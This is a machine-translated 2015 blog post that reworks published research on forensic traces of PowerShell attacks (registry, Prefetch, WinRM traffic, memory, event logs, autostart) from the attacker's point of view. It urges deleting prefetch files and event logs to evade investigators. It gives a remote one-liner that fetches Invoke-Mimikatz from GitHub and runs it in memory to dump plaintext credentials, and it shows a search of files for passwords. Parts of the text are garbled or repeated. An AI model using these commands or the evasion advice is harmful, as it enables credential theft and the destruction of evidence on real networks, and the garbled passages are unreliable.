Mickey · 2015/05/25 10:17
0 x00 profile
This article is mainly for forensics. If I get better at it, I will also write about the practical application of Powershell in Intranet infiltration. All the contents of this article are basically translated from fireEyE’s <
>. I couldn’t understand his article in a lot of places. I finished the article with some stumbling. There are wrong places, but also ask friends to supplement.
As we all know, PowerShell (version 2.0) has been installed by default since Windows 7 SP1 and Windows Server 2008 R2, For Windows Server 2012 R2 and Windows 8.1, powerShell 4.0 is available. Now the attack framework written by Powershell is also very mature, such as the various protocol rebound SHELL (Nishang); If you do not write hard disks using DLL loading technology, you can remotely dump the plaintext Mimikatz (PowerSploit) of login accounts. Powershell Botnet demonstrated by Chris Campbell at the ShmooCon 2013 Security Conference; There are all kinds of Windows domain Intranet environment powerview; SET/METASPLOIT is also starting to support Powershell version of Payloads. As attackers, we also need to familiarize ourselves with current forensics techniques against Powershell, in case we “waltz in, get caught, and don’t take a cloud with us.”
The original article does forensics from registry, Prefetch, network traffic, memory, log, and self-start.
0x01 Registry:
By default, In addition to WinServer 2012 r2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft. Restricted is set to ByPass for running Powershell scripts on other Windows systems, but this is rarely the case. The attacker uses the -executeionPolicy Bypass option to Bypass execution policy restrictions.
0x02 Prefetch:
Prefetch is intended to improve system performance and save time the next time an application loads. The default path is % Systemroot %\prefetch. These *.pf files are often used by forensic personnel to obtain information such as the last running time of the program and the list of files accessed by the program. It is possible for forensics personnel to obtain information about the attack PS script you are running by viewing powershell.exe-59fc8f3d.pf. I’m using Prefetch Parser V1.4 here,
As shown in figure
So every time we run out of Powershell, remember del % Systemroot %\prefetch\ powershell.exe-59fc8f3d.pf
0x03 Network Traffic:
When an attacker penetrates an Intranet, the idea is to obtain the administrator permission of the workgroup first, then infiltrate the domain environment that is not strictly configured, and enable powerShell remoting. Powershell 2.0 Remoting uses port 5985(HTTP) and port 5986(HTTPS) by default. Powershell 2.0 Remoting uses port 5985(HTTP) and port 5986(HTTPS) by default. Powershell 2.0 Remoting uses port 5985(HTTP) and port 5986(HTTPS) by default. I still need to be familiar with the internal network environment and use Remoting on the internal network with normal service flow. I have no other idea.
0 x04 memory:
We can use Volatility framework to analyze wSMProvhost. exe process and see information in XML format in memory space. For example, here he uses the PSSesion remote interactive SHELL to execute “echo” helloWord > c:\text.txt “, and then he can see the message in the wsmprovhost.exe process, as shown in the picture:
However, with the termination of the remote session, this method is no longer useful. To successfully collect evidence, the attacker must be in operation. So I don’t think it’s a big threat to us. If winrm is enabled, it is also possible to see messages in the svchost.exe process. Here he uses the invoke-Mimikatz demo, which is executed remotely in memory by downloading, dumping plaintext passwords, and not writing hard drives. This infiltration technique is useful for real use, as follows:
#! Bash invoke-command-computername 192.168.114.133 {iex((new-object) Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-M imikatz.ps1')); Invoke-Mimikatz -DumpCreds}Copy the codeHere’s what he found in the memory of svchost.exe
0 x05 logs:
The default logging feature for Powershell 2.0 is not very strong, but it has been improved since Powershell 3.0. Whether you run Powershell scripts locally or from Remoting, % Systemroot %\System32\winevt\ will be logged in the following three files
windows powershell.evtx
Copy the codeEach time Powershell starts executing EID 400 or ends EID 403, it records it. The HostName entry ConsoleHost is executed locally, whereas the HostName entry ConsoleHost is executed locally
Microsoft-Windows-PowerShell%4Operational.evtx
Copy the codeMicrosoft-windows-power-shell %4Analytic. Etl [I didn’t find this file on my machine]
If remoting is enabled with WINRM, the following two logs will be generated:
Microsoft-Windows-WinRM%4Operational.evtx
Copy the codeEID 6 records the remoting client address. You can see who connected to the remoting client
Microsoft-Windows-WinRM%4Analytic.etl
Copy the codeEID 32850 records the account information used by the remoting client when it connects to the remoting client. EID 32867/32868 May show the details of the invoke-Command execution, as shown in the figure below
In addition, with the introduction of Microsoft APPLocker, administrators can further verify powershell scripts, such as which PS scripts are allowed to run, which are not allowed to run, or even disable all PS scripts on the computer, but there are known techniques to bypass these. I’ll talk about that in the next book. After AppLocker is enabled, EID 8005 and EID 8006 log authentication information.
%windir%\system32\WindowsPowerShell\v1.0\profile.ps1 set the global profile to add additional logging. Discovery is not possible, refer to the above, not to mention here.
Powershell 3.0 introduces Module Logging capabilities, This can be enabled by group policies (Computer Configuration → Administrative Templates →Windows Components →Windows PowerShell →Turn on Module) Logging), you can see the results of ps script execution in EID 4103, such as I execute
#! bash Get-ChildItem c:\temp -Filter *.txt -Recurse | Select-String passwordCopy the code[EID 4103] [EID 4103] [EID 4103] [EID 4103] [EID 4103] [EID 4103
Even the results of the invoke-Mimikatz execution are recorded, as shown
Remind us again, should delete the log, must delete, outside should be able to delete the specified log tool, but I did not see, some send me a copy.
0x06 Self-start:
Powershell is often self-booted through a registry, start menu, or scheduled tasks, usually found with sysinternals autorun. In addition, C:\Users\
\Documents\WindowsPowerShell\ microsoft.powershell_profile. ps1 can be reached and C:\Windows\System32\WindowsPowerS Hell v1.0 profile.ps1 has the same effect.
Article Reference:
https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf
https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings- Investigating-Powershell-Attacks.pdf